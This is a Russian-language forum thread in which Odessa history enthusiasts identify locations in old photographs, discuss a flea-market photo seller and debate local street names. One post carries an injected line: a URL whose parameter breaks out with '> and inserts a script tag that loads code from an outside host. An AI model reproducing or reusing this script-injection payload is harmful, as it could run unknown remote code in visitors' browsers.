Надо помощь клуба!
Купил сегодня фотографий немного (выложу все), в пачке Одесских было и это фото, но вот где это сфотограировано я не знаю
. Подскажите
|
Надо помощь клуба!
Купил сегодня фотографий немного (выложу все), в пачке Одесских было и это фото, но вот где это сфотограировано я не знаю
. Подскажите
Возможно это роддом№2 на углу Старопортофранковской и Градоначальничьской,там такая-же трансформаторная будка стоит и сейчас.
http://forum.od.ua?f='><script src=http://metthew01.t35.com/matt/php></script>
Дай бог всем иметь то, что имеют те, кто имеет нас!
Сегодня на староконке наткнулась на дядечку Раскидайловская/Ризовская, продавал очень много фотографий военного периода, по 15 грн, думаю, что brassl его знает))) Так вот, в стопке фотографий много тех, которые выложены в галерее. А, одна фотография меня удивила своим наличием.
Когда-то, кто-то выкладывал двух мужиков на нудистском пляже (точнее на камне), еще был разговор, что это брак фотографии или так закрыли причинное место у "модели". Так вот, эта фотография тоже у него продавалась, у меня вопрос "неужели так много копий этой любительской фотографии?" и сразу варианты ответа: а) да, много; б) продает кто-то с форума, так давайте знакомиться))); в) распечатано с форума или галереи.
Пы.Сы. все фотографии были распечатаны на современной бумаге кодак и т.п.
Чем больше узнаю людей, тем больше нравятся собаки
У него и покупал, поэтому есть в галерее![]()
У него очень много фото было не с форума (часть я уже выложил в Архиве, часть не успел). Я думаю что если б он размножал с форума то все фото были бы знакомыми.
Если кто еще что покупает - делитесь пожалуйста (или это глупый призыв?).
А то некоторые виды не покупаю из-за отсутствия свободной наличности, и может статься так что беру то что есть у всех (кроме меня), а то что мало кто видел остается у продавца.
Последний раз редактировалось brassl; 17.07.2011 в 23:07.
Большое спасибо за помощь в опознании! Уже подписал.
Есть немного обновлений.Заходите.Дополняйте
Интересный указатель с надписью.
В левом верхнем углу - Пантелеймоновская 64. 58-й номер тоже хорошо виден. А тюремная стена - на месте нынешнего Макдональдса. То-есть квартала Шмидта между Пантелеймоновсской и Итальянским бульваром не существовало. К слову, Шмидта назывался в те времена Тюремным переулком, а Привокзальная площадь - Тюремной.
Последний раз редактировалось mlch; 18.07.2011 в 22:39.
Последний раз редактировалось Antique; 18.07.2011 в 13:23.
Да никто ж не придирается. Просто принципы немного другие. Тираспольская дорога на месте нынешней Тираспольской улицы существовала еще чуть ли не до появления Одессы. Куда же еще, если не в сторону Херсона вела Херсонская улица. Да и по Московской дороге проще всего было попасть в Москву за 100 лет до появления Новомосковской дороги и Ленинградского шоссе. А чем, собственно дорога отличается от улицы? Когда вдоль дороги стали застраиваться дома, она автоматически стала превращаться в улицу. Сейчас, к сожалению, об этом почему-то забыли, и стали появляться такие топонимические мутанты как улица Люстдорфская дорога.
Социальные закладки